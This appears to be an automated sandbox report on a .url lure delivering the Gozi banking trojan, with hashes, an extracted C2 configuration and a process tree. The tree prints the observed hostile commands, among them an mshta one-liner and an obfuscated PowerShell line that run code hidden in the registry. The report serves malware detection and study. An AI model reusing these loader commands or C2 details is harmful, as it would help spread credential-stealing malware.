Analysis

  • max time kernel
    157s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-10-2023 01:40

General

  • Target

    url/Cliente.url

  • Size

    194B

  • MD5

    0da2f6812c1bc76eaa25be1e6a2eaf4c

  • SHA1

    e4b237e5f7bb7b96e9bfb43c126541fc892d3b0a

  • SHA256

    0042887574aae1f954f0459b9448c0fa4501bb8719843940315d466645da9a7b

  • SHA512

    a5495580fae00444b4edbff6894e1e302025ddff295a26fe519bc229724d3961646afb1cece2be892b19840035152a937fa3f7910e4fe04adea751eb319d96cb

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

fotexion.com

Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Botnet

5050

C2

fotexion.com

Attributes
  • base_path

    /pictures/

  • exe_type

    worker

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 55 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:3728
    • C:\Windows\System32\rundll32.exe
      "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\url\Cliente.url
      1⤵
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:5116
      • C:\Windows\System32\control.exe
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\QHTO49S3\sistema[1].cpl",
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3968
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\QHTO49S3\sistema[1].cpl",
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3056
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\QHTO49S3\sistema[1].cpl",
            4⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of WriteProcessMemory
            PID:1984
            • C:\Windows\system32\control.exe
              C:\Windows\system32\control.exe -h
              5⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:3016
              • C:\Windows\system32\rundll32.exe
                "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                6⤵
                  PID:1268
      • C:\Windows\System32\RuntimeBroker.exe
        C:\Windows\System32\RuntimeBroker.exe -Embedding
        1⤵
          PID:4912
        • C:\Windows\System32\RuntimeBroker.exe
          C:\Windows\System32\RuntimeBroker.exe -Embedding
          1⤵
            PID:4056
          • C:\Windows\Explorer.EXE
            C:\Windows\Explorer.EXE
            1⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of UnmapMainImage
            • Suspicious use of WriteProcessMemory
            PID:3168
            • C:\Windows\System32\mshta.exe
              "C:\Windows\System32\mshta.exe" "about:<hta:application><script>D7t3='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(D7t3).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\2D69E7DB-A838-E7C3-1AB1-5C0BEE75506F\\\MemoryMusic'));if(!window.flag)close()</script>"
              2⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:5052
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jsmcpjdr -value gp; new-alias -name drhbicx -value iex; drhbicx ([System.Text.Encoding]::ASCII.GetString((jsmcpjdr "HKCU:Software\AppDataLow\Software\Microsoft\2D69E7DB-A838-E7C3-1AB1-5C0BEE75506F").LinkAbout))
                3⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3336
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cgc4erki\cgc4erki.cmdline"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1960
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8AA7.tmp" "c:\Users\Admin\AppData\Local\Temp\cgc4erki\CSC67DB7438947B4F56824E70A127ABEA65.TMP"
                    5⤵
                      PID:3064
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\veri0dji\veri0dji.cmdline"
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3452
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9B03.tmp" "c:\Users\Admin\AppData\Local\Temp\veri0dji\CSC33D98D6E85314687A14F1BBD45EAE191.TMP"
                      5⤵
                        PID:4948
                • C:\Windows\syswow64\cmd.exe
                  "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
                  2⤵
                    PID:5012
                • C:\Windows\System32\RuntimeBroker.exe
                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                  1⤵
                    PID:2956

                  Network

                  MITRE ATT&CK Matrix ATT&CK v13

                  Discovery

                  Query Registry

                  1
                  T1012

                  System Information Discovery

                  2
                  T1082

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\QHTO49S3\sistema[1].cpl
                    Filesize

                    206KB

                    MD5

                    72e2a5c797954e895a41be5b20f867b2

                    SHA1

                    419aacfb3ccea9b08277bcc9405054fa4238a597

                    SHA256

                    858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0

                    SHA512

                    77be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\QHTO49S3\sistema[1].cpl
                    Filesize

                    206KB

                    MD5

                    72e2a5c797954e895a41be5b20f867b2

                    SHA1

                    419aacfb3ccea9b08277bcc9405054fa4238a597

                    SHA256

                    858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0

                    SHA512

                    77be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3

                  • C:\Users\Admin\AppData\Local\Temp\RES8AA7.tmp
                    Filesize

                    1KB

                    MD5

                    161b212865a932a6b09844c3724a8971

                    SHA1

                    8d622efeddb67fb207a6e3b8741c1b6261679158

                    SHA256

                    2cfffb223c75932f843232a8d66c45d0eec8e87d8e3bc3097e606231762e0a15

                    SHA512

                    61cace837ca81c8dc845d23de056c6de1d19bd35b201acfa5f42d4b0fc64c3ed92771fda69c91faa86133c007b5e586f308efab614b950254e8c00315a7611fa

                  • C:\Users\Admin\AppData\Local\Temp\RES9B03.tmp
                    Filesize

                    1KB

                    MD5

                    23b5e5597f4ef7384d553b143765ef4b

                    SHA1

                    5a0636d36a36fb941e91287e02e8d8c5df344d64

                    SHA256

                    88c13fcb4a848ed53031ecd0cc6f06fd4e1cab0961afdfb4fd4ef21a8aa96de0

                    SHA512

                    19e61b472817dbae7e9da7ae9482b8210a0a88801a06f56a315372946a3e1acc4ef2d637027b877d07a9ff03b21ae1bcc9cf2b6ecbeaacf0323d39b52a6556e3

                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uypvh0cb.rnf.ps1
                    Filesize

                    60B

                    MD5

                    d17fe0a3f47be24a6453e9ef58c94641

                    SHA1

                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                    SHA256

                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                    SHA512

                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                  • C:\Users\Admin\AppData\Local\Temp\cgc4erki\cgc4erki.dll
                    Filesize

                    3KB

                    MD5

                    5dd8265f6ed4998900701fd7649bc959

                    SHA1

                    3ee50bff0d4723ec9343dafe7756f1147de9977f

                    SHA256

                    e52f52dcb198719c55082c6ab52fe7998785584544589beb6781361c219923e0

                    SHA512

                    e1e6d64a87912e024f369214b56fa06377fe0deed25e40e2880cb4b5250e90f6ea7f7245a049101a85d87a9af6b333fd16430d3df8de756a3a100c6eb693acaa

                  • C:\Users\Admin\AppData\Local\Temp\veri0dji\veri0dji.dll
                    Filesize

                    3KB

                    MD5

                    9435366efd555f9ee036080f02f9c0df

                    SHA1

                    e4b119c1090361ef1fedad82a4561411a3b3f60b

                    SHA256

                    c4682afde7b9b640cd76eb6f684eb9d80399ed980b05f2c0ae8291bf1222cbe5

                    SHA512

                    31060579eef95224b2441795a7a044979403c4d3609718ecfae6809d8dc2ab81216de1ed7b4c099513985ce290dcfe2c92035d3168dba5dcdc3a8a00996a9b55

                  • \??\c:\Users\Admin\AppData\Local\Temp\cgc4erki\CSC67DB7438947B4F56824E70A127ABEA65.TMP
                    Filesize

                    652B

                    MD5

                    087f81115e78b64e98f4e410b2b75e18

                    SHA1

                    4cb418f0cc132da4c858ceeb13d943f913e3a375

                    SHA256

                    6d0a3f0dd4cc0dcbb7add4d87899eb30a4b8183e4e431d824ed34525c5e4e792

                    SHA512

                    06f95142be5326755e09516009f1309626ef52b58cde6b6299c244794f7767f3aedcda006adb14a3fdb52fa01ced125ae278eaafc190f456220851b53d4e7a7c

                  • \??\c:\Users\Admin\AppData\Local\Temp\cgc4erki\cgc4erki.0.cs
                    Filesize

                    405B

                    MD5

                    caed0b2e2cebaecd1db50994e0c15272

                    SHA1

                    5dfac9382598e0ad2e700de4f833de155c9c65fa

                    SHA256

                    21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

                    SHA512

                    86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

                  • \??\c:\Users\Admin\AppData\Local\Temp\cgc4erki\cgc4erki.cmdline
                    Filesize

                    369B

                    MD5

                    5044a4e84c8f7fba8b6760d09b5954c1

                    SHA1

                    c0035f8905c44bb65892b3801d7b71d30977b908

                    SHA256

                    b275381bf834b86e71067f268f7d81d98ce2b2466994f02e02907fcd5d5ba774

                    SHA512

                    ae9d6a12d778a9ec8cd8d153d7934164c26bd211c4216e78e0070a7f65042b24375e0060fff4cd441dcfced921bebaedf7a777ac4dce2f8c6a53a468c012fcd4

                  • \??\c:\Users\Admin\AppData\Local\Temp\veri0dji\CSC33D98D6E85314687A14F1BBD45EAE191.TMP
                    Filesize

                    652B

                    MD5

                    f983b6113f49b9395213b8e730162d07

                    SHA1

                    b576f4c828a9103301b5b45780436281e6a4093b

                    SHA256

                    5763fcbe003c695e3570bf044fbb1b04b26e2a5a409503a53018c7564aa86af4

                    SHA512

                    2e5539cbf31cc14418cafd23437994b541111e2ae0181f97035a2ff969090a6f646f221f96e2fafd1d59d8788338386dfd16a3bbee0e69c38f0d3764ea1940cf

                  • \??\c:\Users\Admin\AppData\Local\Temp\veri0dji\veri0dji.0.cs
                    Filesize

                    406B

                    MD5

                    ca8887eacd573690830f71efaf282712

                    SHA1

                    0acd4f49fc8cf6372950792402ec3aeb68569ef8

                    SHA256

                    568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

                    SHA512

                    2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

                  • \??\c:\Users\Admin\AppData\Local\Temp\veri0dji\veri0dji.cmdline
                    Filesize

                    369B

                    MD5

                    f4f4637bd5cc5e1d13d21c1dc7d26604

                    SHA1

                    e93b0640eb7e09f5c42ae4e08e55ce1b709807f8

                    SHA256

                    56a55ed5237e03ada2dfbaf42471cea84c6e9a9e564dd8c0ebaeeca21bc8fbb0

                    SHA512

                    0f3755dfb240efb71a490ee77c219ce3eb222aa1384cf8a037946bf85a7300cf4cda01910f3df13a360ba2387efd0aba60c9a72e8965794846325c636509d1a4

                  • memory/1268-90-0x000002437A5B0000-0x000002437A5B1000-memory.dmp
                    Filesize

                    4KB

                  • memory/1268-108-0x000002437A8A0000-0x000002437A944000-memory.dmp
                    Filesize

                    656KB

                  • memory/1268-82-0x000002437A8A0000-0x000002437A944000-memory.dmp
                    Filesize

                    656KB

                  • memory/1984-116-0x00000000020B0000-0x00000000020BE000-memory.dmp
                    Filesize

                    56KB

                  • memory/1984-11-0x00000000020B0000-0x00000000020BE000-memory.dmp
                    Filesize

                    56KB

                  • memory/1984-8-0x00000000020D0000-0x00000000020DD000-memory.dmp
                    Filesize

                    52KB

                  • memory/1984-7-0x00000000020B0000-0x00000000020BE000-memory.dmp
                    Filesize

                    56KB

                  • memory/1984-6-0x0000000002070000-0x0000000002099000-memory.dmp
                    Filesize

                    164KB

                  • memory/2956-101-0x000001773DC10000-0x000001773DCB4000-memory.dmp
                    Filesize

                    656KB

                  • memory/2956-105-0x000001773DCC0000-0x000001773DCC1000-memory.dmp
                    Filesize

                    4KB

                  • memory/2956-119-0x000001773DC10000-0x000001773DCB4000-memory.dmp
                    Filesize

                    656KB

                  • memory/3016-83-0x00000000004B0000-0x0000000000554000-memory.dmp
                    Filesize

                    656KB

                  • memory/3016-109-0x00000000004B0000-0x0000000000554000-memory.dmp
                    Filesize

                    656KB

                  • memory/3016-60-0x00000000004B0000-0x0000000000554000-memory.dmp
                    Filesize

                    656KB

                  • memory/3016-61-0x0000000000560000-0x0000000000561000-memory.dmp
                    Filesize

                    4KB

                  • memory/3168-67-0x0000000008AD0000-0x0000000008B74000-memory.dmp
                    Filesize

                    656KB

                  • memory/3168-114-0x0000000008AD0000-0x0000000008B74000-memory.dmp
                    Filesize

                    656KB

                  • memory/3168-68-0x00000000029F0000-0x00000000029F1000-memory.dmp
                    Filesize

                    4KB

                  • memory/3336-30-0x0000024075FF0000-0x0000024076000000-memory.dmp
                    Filesize

                    64KB

                  • memory/3336-31-0x0000024075FF0000-0x0000024076000000-memory.dmp
                    Filesize

                    64KB

                  • memory/3336-13-0x0000024075AF0000-0x0000024075B12000-memory.dmp
                    Filesize

                    136KB

                  • memory/3336-23-0x00007FFA9AC20000-0x00007FFA9B6E1000-memory.dmp
                    Filesize

                    10.8MB

                  • memory/3336-25-0x0000024075FF0000-0x0000024076000000-memory.dmp
                    Filesize

                    64KB

                  • memory/3336-57-0x0000024075FE0000-0x0000024075FE8000-memory.dmp
                    Filesize

                    32KB

                  • memory/3336-43-0x0000024075950000-0x0000024075958000-memory.dmp
                    Filesize

                    32KB

                  • memory/3336-113-0x0000024076100000-0x000002407613D000-memory.dmp
                    Filesize

                    244KB

                  • memory/3336-112-0x00007FFA9AC20000-0x00007FFA9B6E1000-memory.dmp
                    Filesize

                    10.8MB

                  • memory/3336-32-0x0000024075FF0000-0x0000024076000000-memory.dmp
                    Filesize

                    64KB

                  • memory/3336-24-0x0000024075FF0000-0x0000024076000000-memory.dmp
                    Filesize

                    64KB

                  • memory/3336-65-0x0000024076100000-0x000002407613D000-memory.dmp
                    Filesize

                    244KB

                  • memory/3336-103-0x0000024076100000-0x000002407613D000-memory.dmp
                    Filesize

                    244KB

                  • memory/3336-27-0x00007FFA9AC20000-0x00007FFA9B6E1000-memory.dmp
                    Filesize

                    10.8MB

                  • memory/3336-26-0x0000024075FF0000-0x0000024076000000-memory.dmp
                    Filesize

                    64KB

                  • memory/3728-115-0x00000269E0520000-0x00000269E05C4000-memory.dmp
                    Filesize

                    656KB

                  • memory/3728-76-0x00000269E04E0000-0x00000269E04E1000-memory.dmp
                    Filesize

                    4KB

                  • memory/3728-75-0x00000269E0520000-0x00000269E05C4000-memory.dmp
                    Filesize

                    656KB

                  • memory/4056-86-0x0000026106A50000-0x0000026106A51000-memory.dmp
                    Filesize

                    4KB

                  • memory/4056-81-0x0000026106A90000-0x0000026106B34000-memory.dmp
                    Filesize

                    656KB

                  • memory/4056-117-0x0000026106A90000-0x0000026106B34000-memory.dmp
                    Filesize

                    656KB

                  • memory/4912-98-0x000001AF0FFD0000-0x000001AF0FFD1000-memory.dmp
                    Filesize

                    4KB

                  • memory/4912-94-0x000001AF121D0000-0x000001AF12274000-memory.dmp
                    Filesize

                    656KB

                  • memory/4912-118-0x000001AF121D0000-0x000001AF12274000-memory.dmp
                    Filesize

                    656KB